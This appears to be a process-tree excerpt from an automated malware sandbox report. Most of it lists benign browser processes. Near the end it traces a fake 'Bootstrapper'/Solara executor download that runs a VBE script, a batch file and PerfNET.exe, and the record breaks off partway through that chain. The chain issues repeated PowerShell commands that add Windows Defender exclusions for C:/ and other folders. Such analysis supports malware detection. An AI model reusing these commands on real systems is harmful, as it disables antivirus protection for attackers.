C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2652 -childID 1 -isForBrowser -prefsHandle 3236 -prefMapHandle 3008 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a693af3d-8bf8-4b9a-9158-2d775998053c} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:4668
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3944 -childID 2 -isForBrowser -prefsHandle 4120 -prefMapHandle 4116 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1375899c-f364-4b65-82cc-4a9a9451bddc} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4836 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4820 -prefMapHandle 4808 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d96dac95-62c1-45d8-9953-cef976d1bb02} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" utility3⤵
- Checks processor information in registry
PID:6056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 3 -isForBrowser -prefsHandle 5444 -prefMapHandle 5440 -prefsLen 27079 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {809f2821-6e14-4f90-a154-1ae624fb183d} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 4 -isForBrowser -prefsHandle 5436 -prefMapHandle 4948 -prefsLen 27079 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd2159d2-f820-4b97-8fa6-e91854d46aff} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5840 -prefsLen 27079 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d51ee9a-f227-4dff-8c4e-3bc3c166fcd1} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:6136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6100 -childID 6 -isForBrowser -prefsHandle 6092 -prefMapHandle 6088 -prefsLen 27158 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9842bf4-d6cb-4de2-bdf1-c7a570f18cf0} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6436 -parentBuildID 20240401114208 -prefsHandle 6416 -prefMapHandle 6404 -prefsLen 29305 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4987ca9-85f5-4f35-9965-747706d16c79} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" rdd3⤵PID:4200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6444 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6428 -prefMapHandle 6424 -prefsLen 29305 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10e2a8a8-eb59-40c6-aabb-6c13c7c66b3e} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" utility3⤵
- Checks processor information in registry
PID:3288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3864 -childID 7 -isForBrowser -prefsHandle 2540 -prefMapHandle 6804 -prefsLen 27158 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {30f336c0-75cb-4cf2-97aa-28f959dbed59} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7008 -childID 8 -isForBrowser -prefsHandle 6928 -prefMapHandle 6932 -prefsLen 27158 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3be56f8-e2ea-416d-8090-bdb7dc53f5bc} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6776 -childID 9 -isForBrowser -prefsHandle 6748 -prefMapHandle 6784 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5e85064-b356-4cde-a119-77b6ee003a9c} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6160 -childID 10 -isForBrowser -prefsHandle 6172 -prefMapHandle 6064 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e6a7426-b652-478e-99d4-955e972e1888} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:1264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6824 -childID 11 -isForBrowser -prefsHandle 3848 -prefMapHandle 6912 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3f9d14d-dd0a-49ec-9cfe-e4053238e4f3} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:3668
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6860 -childID 12 -isForBrowser -prefsHandle 6872 -prefMapHandle 7560 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93494db1-8bd0-42cf-9f0b-2a080c185f0f} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7032 -childID 13 -isForBrowser -prefsHandle 7088 -prefMapHandle 7084 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2e9b50d-7ef9-4841-b613-a836e4972311} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7688 -childID 14 -isForBrowser -prefsHandle 7664 -prefMapHandle 7652 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01db17fe-6a34-4fde-8339-7b4a18b1e4c8} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:4268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7252 -childID 15 -isForBrowser -prefsHandle 7632 -prefMapHandle 7648 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4e4a3e3-d797-46f8-ab0f-c7cc1dbdcab4} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:896
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8400 -childID 16 -isForBrowser -prefsHandle 8320 -prefMapHandle 8328 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe7f827f-6999-4d8c-8765-487633a6285c} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:2508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8540 -childID 17 -isForBrowser -prefsHandle 8528 -prefMapHandle 8532 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a5ec238-0388-49e5-b1d9-48e27afc5d8f} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:2472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8728 -childID 18 -isForBrowser -prefsHandle 8704 -prefMapHandle 8712 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f883fd85-80f3-4c1d-9fa9-763f67de7a5e} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8608 -childID 19 -isForBrowser -prefsHandle 8940 -prefMapHandle 8944 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4396fbe6-7a3a-4cfc-a115-f13a1e98ef9c} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:3140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9228 -childID 20 -isForBrowser -prefsHandle 9220 -prefMapHandle 9116 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5037561a-39c1-42eb-be99-96dd881fc5ed} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:4376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 21 -isForBrowser -prefsHandle 9160 -prefMapHandle 9228 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5ab5be8-b866-4b08-80db-83a48bccb251} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:2736
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8172 -childID 22 -isForBrowser -prefsHandle 8596 -prefMapHandle 8592 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4154b96-a70a-4b0e-91b0-82966648b9f8} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:1916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8512 -childID 23 -isForBrowser -prefsHandle 9116 -prefMapHandle 8956 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3782739-5661-4210-82d7-23689b56b98b} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:4364
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8864 -childID 24 -isForBrowser -prefsHandle 7264 -prefMapHandle 8840 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {299e4696-ed9a-465c-842a-1dc5acc6f744} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:2448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8280 -childID 25 -isForBrowser -prefsHandle 7520 -prefMapHandle 3284 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3015e18d-da7e-4116-ae5c-78ad13d3e2eb} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7188 -childID 26 -isForBrowser -prefsHandle 7124 -prefMapHandle 3868 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e3df4c4-6c8c-46bf-b7d8-4d9291c89d1b} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:2936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7500 -childID 27 -isForBrowser -prefsHandle 9360 -prefMapHandle 7692 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1bc4e37-c476-425b-8c6a-2d7116e2c042} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:5900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6820 -childID 28 -isForBrowser -prefsHandle 9484 -prefMapHandle 6836 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d0619b8-4282-4f47-a3ec-23b4f42d236b} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:6344
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9468 -childID 29 -isForBrowser -prefsHandle 8180 -prefMapHandle 7820 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9728eb5d-7cc0-4678-9654-4612c12b64d5} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:6352
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9156 -childID 30 -isForBrowser -prefsHandle 8956 -prefMapHandle 8424 -prefsLen 28122 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {065f2574-c7ae-431d-a9e7-b923175314ff} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:6360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9464 -childID 31 -isForBrowser -prefsHandle 8812 -prefMapHandle 7536 -prefsLen 30701 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d19603b6-b124-4d54-82c8-734941edcb4a} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:4556
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10312 -childID 32 -isForBrowser -prefsHandle 10308 -prefMapHandle 10304 -prefsLen 28162 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae6bff5a-0aeb-49ac-8164-13b23331b5d7} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:6748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6344 -childID 33 -isForBrowser -prefsHandle 9608 -prefMapHandle 9524 -prefsLen 28162 -prefMapSize 244658 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b5f761-b707-4d79-b2f6-6a0856d8ae64} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" tab3⤵PID:7164
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x50c 0x5181⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6916
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\BootstrapperV1.19.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6324
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6436
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:6064 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffd6922cc40,0x7ffd6922cc4c,0x7ffd6922cc582⤵PID:5432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=1840 /prefetch:22⤵PID:596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1872,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2212 /prefetch:32⤵PID:2992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2312,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2500 /prefetch:82⤵PID:5148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3160 /prefetch:12⤵PID:7088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:6240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4548,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3696 /prefetch:12⤵PID:964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4820 /prefetch:82⤵PID:6580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4384 /prefetch:82⤵PID:6812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5360,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5436 /prefetch:12⤵PID:6412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5148,i,10058913673321807747,12629333845693553487,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5028 /prefetch:82⤵PID:5568
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3344
-
C:\Users\Admin\Desktop\BootstrapperV1.19.exe"C:\Users\Admin\Desktop\BootstrapperV1.19.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5504 -
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.19.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.19.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6768 -
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.19.exe" --isUpdate true3⤵
- Checks computer location settings
- Executes dropped EXE
PID:6212 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c ipconfig /all4⤵PID:1172
-
C:\Windows\system32\ipconfig.exeipconfig /all5⤵
- Gathers network information
PID:556
-
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn4⤵PID:6676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solaraexecutor.exe"C:\Users\Admin\AppData\Local\Temp\Solaraexecutor.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1208 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:6972 -
C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe"C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:6228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵PID:3772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
